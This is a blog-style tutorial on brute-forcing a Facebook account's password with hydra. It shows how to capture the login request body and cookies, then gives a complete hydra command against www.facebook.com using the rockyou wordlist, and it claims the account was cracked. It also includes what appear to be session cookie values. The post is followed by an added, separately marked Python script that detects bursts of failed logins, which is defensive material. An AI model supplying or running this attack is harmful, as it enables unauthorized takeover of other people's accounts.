In this post I am going to show you how to use hydra to hack a Facebook account. If you don’t know already, hydra is one of the best available tools for cracking online passwords. It uses brute force methodology to crack passwords and get access to other users’ accounts.

Before we actually go and use hydra to crack a Facebook account, we first need to learn how to use it. Hydra has a very complex syntax for attacking web applications. So, let’s just go and see the syntax first.

SYNTAX:

hydra -V -f -l <login id> -P <password list> target service "login_uri:parameters:S=success string:H=optional headers"

At first the syntax looks very complex. But don’t worry, I will make it easier for you to understand. Let’s just go and explore the complex-looking syntax step by step.

hydra – This is the program which we are using to launch the attack.

Hydra comes pre-installed in all versions of Kali. So, you don’t need to do anything fancy. Just launch it from the command line by typing hydra.

Next we need to pass the command line options to hydra to tell it what to do. These options are described below:

-V : verbosely output all the username and password combinations tried

-f : tells hydra to stop when a successful username and password combination is found

-l : specifies the Facebook id to attack

-P : specifies the wordlist which we want to use for password cracking

target : the domain name or IP address of the web server (www.facebook.com in this case)

service : the service which we want to attack. For web applications it is usually https-form-post

At the end, we need to pass a string containing at least three parameters separated by colons. The first parameter is the login uri, which in the case of Facebook is /login.php.

Next, we need to pass the parameters which the site uses in the POST request. We can find them by visiting the website https://www.facebook.com/login.php, then right clicking anywhere and inspecting element. Then go to the network tab and fill in wrong credentials in the Facebook login form. Click login to submit the request. After submitting the request it will look something like this:

Now, make sure you select the POST request to /login.php in the network tab as highlighted in the above screenshot (blue strip). Click on edit and resend raw headers on the right. Go to the bottom and copy the request body as shown.

That’s it, we have got the parameters. Now, we only need the cookies. You can copy the cookie from the same place. Look at the screenshot below.

Now, we have everything we need to start attacking Facebook. So, let’s do it.

Cracking Facebook Account

Before we start our attack, let us summarize what we need and what we have

login id – pipaxajub@xgmailoo.com

password list – we are going to use the famous rockyou.txt (/usr/share/wordlists/rockyou.txt)

login uri – /login.php

Success string – 302 Found (Facebook redirects us upon a successful login attempt)

Cookie – Cookie: fr=1RmAGyVQjUQvmMHbx..Bbt5QG._g.AAA.0.0.Bbt5YX.AWXVRVxn; sb=BpS3W_v5Kj88_BHTPlhJc8jz; _js_datr=BpS3W9RZC3WOVGdRDnANmr7t; wd=1366x158; datr=BpS3W9RZC3WOVGdRDnANmr7t; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; _js_reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1%26lwv%3D100; act=1538758289006%2F0

parameters – before using the parameters we copied, we need to make a few small changes to them. Let’s say the POST parameters we copied are:

lsd=AVrchJ_j&display=&enable_profile_selector=&isprivate=&legacy_return=0&profile_selector_ids=&return_session=&skip_api_login=&signed_next=&trynum=2&timezone=-330&lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0%3D&lgnrnd=094935_05ZU&lgnjs=1538758178&email=pipaxajub@xgmailoo.com&pass=mypassword&prefill_contact_point=&prefill_source=&prefill_type=&first_prefill_source=&first_prefill_type=&had_cp_prefilled=false&had_password_prefilled=false&ab_test_data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

We need to change the highlighted email and password fields to ^USER^ and ^PASS^ respectively. After making the changes it will look like:

lsd=AVrchJ_j&display=&enable_profile_selector=&isprivate=&legacy_return=0&profile_selector_ids=&return_session=&skip_api_login=&signed_next=&trynum=2&timezone=-330&lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0%3D&lgnrnd=094935_05ZU&lgnjs=1538758178&email=^USER^&pass=^PASS^&prefill_contact_point=&prefill_source=&prefill_type=&first_prefill_source=&first_prefill_type=&had_cp_prefilled=false&had_password_prefilled=false&ab_test_data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Finally, let’s just go and hack it.

hydra -V -f -l pipaxajub@xgmailoo.com -P /usr/share/wordlists/rockyou.txt www.facebook.com https-form-post/login.php:lsd=AVpU3ryk&display=&enable_profile_selector=&isprivate=&legacy_return=0&profile_selector_ids=&return_session=&skip_api_login=&signed_next=&trynum=1&timezone=-330&lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0%3D&lgnrnd=072001_D_R0&lgnjs=1538662825&email=pipaxajub%40xgmailoo.com&pass=^PASS^&prefill_contact_point=pipaxajub%40xgmailoo.com&prefill_source=browser_dropdown&prefill_type=contact_point&first_prefill_source=browser_dropdown&first_prefill_type=contact_point&had_cp_prefilled=true&had_password_prefilled=false&ab_test_data=AAAAAAAAA%2FfAAAAAAAAAAAAAAAAAAAAAAAAAAfAAAA%2FVAAAAAACAAB:S=302 Found:H=Cookie: fr=3hbeXmLbS3rchFjoy.AWXWzgFPNDY4prUO3J8qp0M4mnU.BbtiAW.ql.AAA.0.0.BbtiGR.AWUazXzw; sb=FiC2WwrFWqKXnIDWiH5ndj_I; wd=1366x610; datr=FiC2W-MY-F0pz5EhTffwl8K7; locale=en_GB; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfe9PsKtmkfV4tRhy9-mZcXQURworCchbRiP-AvYiHjBYvV8iS3mHZI9k8irdFK6EmyVTDfazWWbV3hocXYIjNOhLdHN3aM8Ze9OsEupCLToSA%26smuh%3D53158%26lh%3DAc8lQWN1lWI2vAgj; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; _js_reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin; act=1538662846633%2F3

After a few minutes of running, hydra finally brings me the correct login and password details.

So, we finally managed to hack the Facebook account with hydra.
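
Seen from the server side, the run described above is one account receiving a rapid series of failed POSTs to /login.php, possibly ending in a single 302. The following is an added example, not part of the original post, that flags this pattern in login records; the log format, thresholds, function names and sample lines are all constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed application auth-log format (constructed for this example):
# <UTC timestamp> src=<ip> POST /login.php account=<id> status=<http status>
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) POST /login\.php "
                     r"account=(?P<account>\S+) status=(?P<status>\d{3})$")
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"

def sample_log():
    """Constructed data: one account being guessed, one user who mistyped."""
    t0 = datetime(2018, 10, 5, 9, 50, 0)
    def line(offset, src, account, status):
        ts = (t0 + timedelta(seconds=offset)).strftime(TS_FMT)
        return f"{ts} src={src} POST /login.php account={account} status={status}"
    rows = [line(2 * i, "203.0.113.7", "alice@example.test", 200) for i in range(6)]
    rows.append(line(12, "203.0.113.7", "alice@example.test", 302))
    rows += [line(5, "198.51.100.9", "bob@example.test", 200),
             line(660, "198.51.100.9", "bob@example.test", 200),
             line(680, "198.51.100.9", "bob@example.test", 302), "not a log line"]
    return sorted(rows)  # ISO timestamps sort chronologically

def detect_guessing(lines, max_failures=5, window=timedelta(seconds=60)):
    """Flag accounts with >= max_failures failed logins inside one window.
    A 302 counts as success (as in the post); any other status as a failure."""
    recent = defaultdict(deque)  # account -> (timestamp, source) of failures
    alerts = {}
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if m is None:
            continue  # ignore malformed lines
        ts = datetime.strptime(m["ts"], TS_FMT)
        account, q = m["account"], recent[m["account"]]
        while q and ts - q[0][0] > window:
            q.popleft()  # drop failures older than the window
        if m["status"] == "302":
            if account in alerts and q:  # success right after a flagged burst
                alerts[account]["success_after_burst"] = True
            q.clear()
            continue
        q.append((ts, m["src"]))
        if len(q) >= max_failures:
            hit = alerts.setdefault(account, {"sources": set(), "success_after_burst": False})
            hit["sources"].update(src for _, src in q)
    return alerts

if __name__ == "__main__":
    print(detect_guessing(sample_log()))
```

Keying the window on the account rather than the source address means the burst is still counted when the attempts arrive from several addresses.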


